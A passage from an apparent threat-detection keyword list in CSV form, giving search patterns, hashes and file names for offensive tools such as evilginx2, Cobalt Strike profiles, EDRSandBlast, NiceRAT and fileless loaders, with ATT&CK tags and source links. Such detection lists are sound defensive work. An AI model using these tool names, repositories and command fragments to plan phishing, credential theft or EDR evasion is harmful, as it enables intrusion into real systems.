Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*ff_osx_extension-dropper*",".{0,1000}ff_osx_extension\-dropper.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ff0f7b3bceac2a15be7b35bc7c1933b46ba6eeca6bba97dbd5227b59b913cb26*",".{0,1000}ff0f7b3bceac2a15be7b35bc7c1933b46ba6eeca6bba97dbd5227b59b913cb26.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*ff21d3231fe5e5c81f8640a0448236555e0730c58e4aec21c8004c6aa71e4eb4*",".{0,1000}ff21d3231fe5e5c81f8640a0448236555e0730c58e4aec21c8004c6aa71e4eb4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ff5a3bf00aa5f5664da20030aaafd09333f2a75830d3e7df3666d8c9fea9eaaa*",".{0,1000}ff5a3bf00aa5f5664da20030aaafd09333f2a75830d3e7df3666d8c9fea9eaaa.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*FF5F7C4C-6915-4C53-9DA3-B8BE6C5F1DB9*",".{0,1000}FF5F7C4C\-6915\-4C53\-9DA3\-B8BE6C5F1DB9.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*FFA0FDDE-BE70-49E4-97DE-753304EF1113*",".{0,1000}FFA0FDDE\-BE70\-49E4\-97DE\-753304EF1113.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*FFA0FDDE-BE70-49E4-97DE-753304EF1113*",".{0,1000}FFA0FDDE\-BE70\-49E4\-97DE\-753304EF1113.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*ffa5514b45c48061e412487d4defdeffa87a338213aa1bc4aabb3259ce18d7aa*",".{0,1000}ffa5514b45c48061e412487d4defdeffa87a338213aa1bc4aabb3259ce18d7aa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*ffb3ecd39698fe5e2fc33483b159f10d1ba16801682aab754f61ccb814eff5d7*",".{0,1000}ffb3ecd39698fe5e2fc33483b159f10d1ba16801682aab754f61ccb814eff5d7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b*",".{0,1000}ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b","10","10","N/A","N/A","N/A","N/A" "*ffe1396fa56e5f86812443498cd6c8abfca613099df1261d08f06a73b14be042*",".{0,1000}ffe1396fa56e5f86812443498cd6c8abfca613099df1261d08f06a73b14be042.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing 
login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*FFE5AD77-8AF4-4A3F-8CE7-6BDC45565F07*",".{0,1000}FFE5AD77\-8AF4\-4A3F\-8CE7\-6BDC45565F07.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*ffebf73d11403dc0bb57ab23a775a568ff5c67c1bb5f8fac7a1f2fbd3960b619*",".{0,1000}ffebf73d11403dc0bb57ab23a775a568ff5c67c1bb5f8fac7a1f2fbd3960b619.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fff54c4b8a879869c50760512e87a39578fea5e07ecead1086af4b50561b5453*",".{0,1000}fff54c4b8a879869c50760512e87a39578fea5e07ecead1086af4b50561b5453.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ffnbelfdoeiohenkjibnmadjiehjhajb*",".{0,1000}ffnbelfdoeiohenkjibnmadjiehjhajb.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ffuf *-input-cmd*",".{0,1000}ffuf\s.{0,1000}\-input\-cmd.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf *-u http*",".{0,1000}ffuf\s.{0,1000}\-u\shttp.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf -c *",".{0,1000}ffuf\s\-c\s.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf -fs 185 -c -w 
*",".{0,1000}ffuf\s\-fs\s185\s\-c\s\-w\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ffuf -w *",".{0,1000}ffuf\s\-w\s.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf.exe*",".{0,1000}ffuf\.exe.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf/ffuf*",".{0,1000}ffuf\/ffuf.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf_*_freebsd_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_freebsd_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf_*_linux_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_linux_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" 
"*ffuf_*_macOS_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_macOS_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf_*_openbsd_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_openbsd_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf_*_windows_*.zip*",".{0,1000}ffuf_.{0,1000}_windows_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*ffuf-master.zip*",".{0,1000}ffuf\-master\.zip.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*fgdump.exe*",".{0,1000}fgdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fgexec.exe*",".{0,1000}fgexec\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - 
TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fhbohimaelbohpjbbldcngcnapndodjp*",".{0,1000}fhbohimaelbohpjbbldcngcnapndodjp.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*fhilaheimglignddkjgofkcbgekhenbh*",".{0,1000}fhilaheimglignddkjgofkcbgekhenbh.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*fierce --domain* --dns-servers *",".{0,1000}fierce\s\-\-domain.{0,1000}\s\-\-dns\-servers\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*FiercePhish*",".{0,1000}FiercePhish.{0,1000}","offensive_tool_keyword","FiercePhish","FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. 
","T1566 - T1566.001 - T1566.002 - T1566.003","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Phishing","https://github.com/Raikia/FiercePhish","1","1","N/A","N/A","10","1267","251","2024-01-09T02:59:26Z","2016-12-31T19:41:24Z" "*Fiesta Exploit Kit*",".{0,1000}Fiesta\sExploit\sKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*-file *.bin -instanceid 1337 - source persistence*",".{0,1000}\-file\s.{0,1000}\.bin\s\-instanceid\s1337\s\-\ssource\spersistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*--file dnschef.ini *",".{0,1000}\-\-file\sdnschef\.ini\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*File Generated Successfully.Run Defeat-Defender.bat on target machine*",".{0,1000}File\sGenerated\sSuccessfully\.Run\sDefeat\-Defender\.bat\son\starget\smachine.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*file_parsers/group_policy_preferences.py*",".{0,1000}file_parsers\/group_policy_preferences\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*File_Smuggler_Http_Handler*",".{0,1000}File_Smuggler_Http_Handler.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. 
enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*FILE_TO_EXFIL = ""*",".{0,1000}FILE_TO_EXFIL\s\=\s\"".{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*FileControler/FileControler_x64.dll*",".{0,1000}FileControler\/FileControler_x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*FileControler/FileControler_x86.dll*",".{0,1000}FileControler\/FileControler_x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*File-Extensions-Wordlist.txt*",".{0,1000}File\-Extensions\-Wordlist\.txt.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*Fileless Lateral Movement.csproj*",".{0,1000}Fileless\sLateral\sMovement\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - 
TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*fileless-elf-exec*",".{0,1000}fileless\-elf\-exec.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*FilelessPELoader.cpp*",".{0,1000}FilelessPELoader\.cpp.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessPELoader.exe*",".{0,1000}FilelessPELoader\.exe.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessPELoader.sln*",".{0,1000}FilelessPELoader\.sln.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessPELoader.vcxproj*",".{0,1000}FilelessPELoader\.vcxproj.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessPELoader-main*",".{0,1000}FilelessPELoader\-main.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*FilelessShellcode.cpp*",".{0,1000}FilelessShellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*FilelessShellcode.exe*",".{0,1000}FilelessShellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*FilelessShellcode.sln*",".{0,1000}FilelessShellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - 